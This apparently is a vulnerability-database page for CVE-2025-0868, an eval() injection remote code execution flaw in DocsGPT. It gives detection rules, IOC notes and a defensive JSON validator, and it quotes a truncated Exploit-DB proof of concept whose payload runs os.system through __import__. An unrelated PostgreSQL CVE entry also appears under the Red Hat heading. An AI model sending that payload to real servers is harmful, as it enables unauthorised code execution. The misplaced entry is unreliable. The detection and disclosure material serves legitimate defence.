CVE-2025-0868
Published 2025-02-20
Priority P187 · critical · 9.3 (CVSS 4.0)
ITW · EXPLOIT · VulnCheck KEV · Initial access
Exploited in the wild
EPSS: 15.10% (96.3th percentile)
A vulnerability that could result in Remote Code Execution (RCE) has been found in DocsGPT. Due to improper parsing of JSON data using eval(), an unauthorized attacker could send arbitrary Python code to be executed via the /api/remote endpoint.
This issue affects DocsGPT: from 0.8.1 through 0.12.0.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| arc53 | docsgpt | 0.8.1 – 0.12.0 | — |
| arc53 | docsgpt | 0.8.1 – 0.12.0 | — |
Detection & IOCs
snort
alert http any any -> $HOME_NET any (msg:"ET WEB_SPECIFIC_APPS DocsGPT Remote Code Execution Attempt (CVE-2025-0868)"; flow:established,to_server; http.method; content:"POST"; http.uri; bsize:11; content:"/api/remote"; http.request_body; content:"user|3d|"; content:"source|3d|"; content:"name|3d|"; content:"data|3d 7b|"; content:"|22|source|22 3a 22|"; content:"|22|client_id|22 3a 22|"; content:"|22|client_secret|22 3a|"; content:"|22|user_agent|22 3a 22|"; content:"|22|search_queries|22 3a|"; content:"|22|number_posts|22 3a|"; content:"|22|rce|5c 5c 5c 5c 22 3a 5f 5f|import|5f 5f 28 27|"; fast_pattern; reference:url,github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2025/CVE-2025-0868.yaml; reference:cve,2025-0868; classtype:attempted-admin; sid:2060779; rev:1; metadata:attack_target Server, tls_state plaintext, created_at 2025_03_11, cve CVE_2025_0868, deployment Perimeter, deployment Internal, performance_impact Low, confidence High, signature_severity Major, tag Exploit, updated_at 2025_03_11, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application; target:dest_ip;)
- Detect POST requests to /api/remote with a URL-encoded body containing the 'rce' key followed by escaped quotes and __import__, the canonical injection pattern for this CVE.
- The Nuclei template matches on both an out-of-band DNS interaction (via interactsh) AND response body fields '"task_id":' and '"status":' to confirm successful exploitation.
- FOFA fingerprint for identifying exposed DocsGPT instances: search for body containing 'Welcome to DocsGPT'.
- The exploit payload smuggles Python code inside a JSON key name by injecting an escaped quote sequence ('rce\\\":') to break out of the JSON structure and inject into the eval() call.
- The HTTP request body must include all of: user=, source=, name=, data={...} with client_id, client_secret, user_agent, search_queries, number_posts fields, all required by the vulnerable endpoint before eval() is reached.
- The exploit targets a specific port (7091) in the PoC, but this is the author's local test configuration; the actual DocsGPT deployment port may vary.
- The Snort rule (sid:2060779) is scoped to plaintext HTTP only (tls_state plaintext); TLS-wrapped deployments of DocsGPT will not be detected by this rule without SSL inspection.
- The vulnerability affects versions 0.8.1 through 0.12.0 inclusive; version 0.12.1 and later are remediated.
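Added example (not DocsGPT's code and not the vendor's patch): the advisory attributes the flaw to the `data` form field being parsed with eval(). The code below parses that field with `json.loads` and an allow-list of the keys listed above, so a body whose `data` is not pure JSON is refused rather than evaluated. The function names, accepted types and sample bodies are assumptions constructed for illustration.

```python
import json
from urllib.parse import parse_qs

# Keys named in the detection notes above; the accepted types are assumptions.
EXPECTED = {
    "source": str, "client_id": str, "client_secret": (str, int),
    "user_agent": str, "search_queries": list, "number_posts": int,
}

def parse_remote_data(raw: str) -> dict:
    """Parse the `data` form field strictly as JSON; nothing is evaluated."""
    try:
        obj = json.loads(raw)
    except json.JSONDecodeError as exc:
        raise ValueError(f"data is not valid JSON: {exc.msg}") from None
    if not isinstance(obj, dict):
        raise ValueError("data must be a JSON object")
    unknown = sorted(set(obj) - set(EXPECTED))
    if unknown:
        raise ValueError(f"unexpected keys: {unknown}")
    for key, types in EXPECTED.items():
        if key not in obj:
            raise ValueError(f"missing key: {key}")
        if not isinstance(obj[key], types):
            raise ValueError(f"wrong type for key: {key}")
    return obj

def triage_body(body: str) -> str:
    """Classify a form-encoded /api/remote request body (hypothetical helper)."""
    raw = parse_qs(body, keep_blank_values=True).get("data", [""])[0]
    try:
        parse_remote_data(raw)
    except ValueError as exc:
        return f"reject: {exc}"
    return "ok"

# Constructed sample bodies, not captured traffic.
PREFIX = 'user=1&source=reddit&name=other&data={"source":"reddit","client_id":"id",'
FIELDS = '"client_secret":"s","user_agent":"ua","search_queries":["x"],"number_posts":10'
BENIGN = PREFIX + FIELDS + "}"
# A Python expression where a JSON value belongs: json.loads refuses it.
NOT_JSON = PREFIX + FIELDS + ',"rce":__import__(\'placeholder\')}'
# Well-formed JSON carrying a key outside the allow-list.
EXTRA_KEY = PREFIX + FIELDS + ',"rce":1}'

if __name__ == "__main__":
    for name, body in [("benign", BENIGN), ("not_json", NOT_JSON), ("extra_key", EXTRA_KEY)]:
        print(name, "->", triage_body(body))
```

The same function can be run over logged request bodies for /api/remote: any "reject" result on a request that reached a vulnerable version is worth a closer look.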
CVSS provenance
nvd · v4.0 · 9.3 CRITICAL · CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
vulncheck · 9.3 CRITICAL
vendor_redhat · 6.8 MEDIUM
GHSA
DocsGPT Allows Remote Code Execution
ghsa·2025-02-20
CVE-2025-0868 [CRITICAL] CWE-77 DocsGPT Allows Remote Code Execution
OSV
DocsGPT Allows Remote Code Execution
osv·2025-02-20
CVE-2025-0868 [CRITICAL] DocsGPT Allows Remote Code Execution
VulnCheck
Improper Neutralization of Directives in Dynamically Evaluated Code ('Eval Injection')
vulncheck·2025·CVSS 9.3
CVE-2025-0868 [CRITICAL] Improper Neutralization of Directives in Dynamically Evaluated Code ('Eval Injection')
Affected: Arc53 DocsGPT
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2025-06-08&host_type=src&vulnerability=cve-2025-0868; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map
Red Hat
postgresql: PostgreSQL executes arbitrary code in restore operation
vendor_redhat·2025-08-14·CVSS 6.8
CVE-2025-8715 [MEDIUM] CWE-93 postgresql: PostgreSQL executes arbitrary code in restore operation
Improper neutralization of newlines in pg_dump in PostgreSQL allows a user of the origin server to inject arbitrary code for restore-time execution as the client operating system account running psql to restore the dump, via psql meta-commands inside a purpose-crafted object name. The same attacks can achieve SQL injection as a superuser of the restore target server. pg_dumpall, pg_restore, and pg_upgrade are also affected. Versions before PostgreSQL 17.6, 16.10, 15.14, 14.19, and 13.22 are affected. Versions before 11.20 are unaffected. CVE-2012-0868 had fixed this class of problem, but version 11.20 reintroduced it.
A flaw was found in PostgreSQL. This vulnerability allows a malicious user of the PostgreSQL server to i
Suricata
ET WEB_SPECIFIC_APPS DocsGPT Remote Code Execution Attempt (CVE-2025-0868)
suricata·2025-03-11·CVSS 9.3
CVE-2025-0868 [CRITICAL] ET WEB_SPECIFIC_APPS DocsGPT Remote Code Execution Attempt (CVE-2025-0868)
Exploit-DB
DocsGPT 0.12.0 - Remote Code Execution
exploitdb·2025-04-09·CVSS 9.3
CVE-2025-0868 [CRITICAL] DocsGPT 0.12.0 - Remote Code Execution
---
# Exploit Title: DocsGPT 0.12.0 - Remote Code Execution
# Date: 09/04/2025
# Exploit Author: Shreyas Malhotra (OSMSEC)
# Vendor Homepage: https://github.com/arc53/docsgpt
# Software Link: https://github.com/arc53/DocsGPT/archive/refs/tags/0.12.0.zip
# Version: 0.8.1 through 0.12.0
# Tested on: Debian Linux/Ubuntu Linux/Kali Linux
# CVE: CVE-2025-0868
import requests
# TARGET CONFIG
TARGET = "http://10.0.2.15:7091" # Change this
# Malicious payload string - carefully escaped - modify the python code if necessary
malicious_data = (
'user=1&source=reddit&name=other&data={"source":"reddit",'
'"client_id":"1111","client_secret":1111,"user_agent":"111",'
'"search_queries":[""],"number_posts":10,'
'"rce\\\\":__import__(\'os\').system(\'touch /tmp/te
Nuclei
DocsGPT - Unauthenticated Remote Code Execution
nuclei·CVSS 9.3
CVE-2025-0868 [CRITICAL] DocsGPT - Unauthenticated Remote Code Execution
A vulnerability that could result in Remote Code Execution (RCE) has been found in DocsGPT. Due to improper parsing of JSON data using eval(), an unauthorized attacker could send arbitrary Python code to be executed via the /api/remote endpoint. This issue affects DocsGPT from 0.8.1 through 0.12.0.
Template:
id: CVE-2025-0868
info:
  name: DocsGPT - Unauthenticated Remote Code Execution
  author: iamnoooob,rootxharsh,pdresearch
  severity: critical
  description: |
    A vulnerability, that could result in Remote Code Execution (RCE), has been found in DocsGPT. Due to improper parsing of JSON data using eval() an unauthorized attacker could send arbitrary Python code to be executed via /api/remote endpoint.This issue affects DocsGPT- from 0.8.1 through